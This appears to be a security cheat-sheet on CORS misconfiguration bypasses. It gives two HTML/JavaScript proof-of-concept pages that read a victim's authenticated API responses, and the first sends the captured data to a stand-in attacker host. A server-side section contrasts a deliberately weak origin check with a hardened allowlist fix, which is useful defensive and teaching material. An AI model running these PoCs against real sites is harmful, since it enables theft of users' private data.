Summary of CORS bypass methods
Bypass: the server validates only the domain name
PoC. The target normally answers with "Access-Control-Allow-Origin: https://xx.co" and "Access-Control-Allow-Credentials: true". Because the check only looks for the domain name, a request carrying Origin: https://xx.co.evil.net is answered with Access-Control-Allow-Origin: https://xx.co.evil.net, so the attacker-controlled origin can read the authenticated response.

<html>
<body>
<button type='button' onclick='cors()'>CORS</button>
<p id='demo'></p>
<script>
function cors() {
  var xhttp = new XMLHttpRequest();
  xhttp.onreadystatechange = function() {
    if (this.readyState == 4 && this.status == 200) {
      var a = this.responseText;
      document.getElementById("demo").innerHTML = a;
      console.log(a);
      // Send the captured body with a separate request; reusing xhttp here
      // would re-enter this handler on every response.
      var post = new XMLHttpRequest();
      post.open("POST", "http://evil.cors.com", true);
      post.withCredentials = true;
      post.send("data=" + a);
    }
  };
  xhttp.open("GET", "https://www.xx.co/api/v1/users/*******", true);
  xhttp.withCredentials = true;
  xhttp.send();
}
</script>
</body>
</html>
The requesting origin is not on the whitelist, yet the response still carries Access-Control-Allow-Credentials: true
<html>
<body>
<h2>CORS PoC</h2>
<div id="demo">
  <button type="button" onclick="cors()">Exploit</button>
</div>
<script>
function cors() {
  var xhr = new XMLHttpRequest();
  xhr.onreadystatechange = function() {
    if (this.readyState == 4 && this.status == 200) {
      // alert() returns undefined, so show the body in the page and in the alert separately.
      document.getElementById("demo").innerHTML = this.responseText;
      alert(this.responseText);
    }
  };
  xhr.open("GET", "https://api.xx.com/endpoint", true);
  xhr.withCredentials = true;
  xhr.send();
}
</script>
</body>
</html>
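Both PoCs above work because the server derives Access-Control-Allow-Origin from a loose check on the Origin header and still sends Access-Control-Allow-Credentials: true. The following is an added server-side example (not code from the original page): weakAllowOrigin() mirrors the domain-only check that lets https://xx.co.evil.net through, and strictCorsHeaders() shows the fix, an exact-match allowlist on the full origin. The allowlist entries reuse the page's placeholder host xx.co and are assumptions.

```javascript
// Added example: origin validation on the server side (Node.js style).
// Allowlist entries are assumed values built from the page's placeholder host.
const ALLOWED_ORIGINS = new Set(["https://xx.co", "https://www.xx.co"]);

// Vulnerable check: only asks whether the trusted domain appears somewhere
// in the Origin header. "https://xx.co.evil.net" and "https://evilxx.co"
// both pass, which is exactly what the PoCs above rely on.
function weakAllowOrigin(origin) {
  return typeof origin === "string" && origin.includes("xx.co");
}

// Hardened check: parse the Origin, require it to be a serialized origin
// (scheme + host + optional port, nothing else) and look it up in an
// explicit allowlist. Returns the CORS headers to set, or null to set none,
// in which case the browser blocks the cross-origin read. The literal
// string "null" and unlisted origins are never reflected.
function strictCorsHeaders(origin) {
  if (typeof origin !== "string") return null;
  let parsed;
  try {
    parsed = new URL(origin);
  } catch {
    return null; // malformed, or the "null" origin sent by sandboxed frames
  }
  // parsed.origin drops any path/userinfo and lowercases the host; if it
  // differs from what was sent, the header was not a plain origin.
  if (parsed.origin !== origin || !ALLOWED_ORIGINS.has(origin)) return null;
  return {
    "Access-Control-Allow-Origin": origin,
    "Access-Control-Allow-Credentials": "true",
    // Without Vary, a shared cache could serve one origin's ACAO to another.
    "Vary": "Origin",
  };
}
```

A quick way to detect the weak variant during a review is to send an Origin that merely contains the trusted domain and look for it echoed back together with Access-Control-Allow-Credentials: true.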
Same-origin policy bypass
JSONP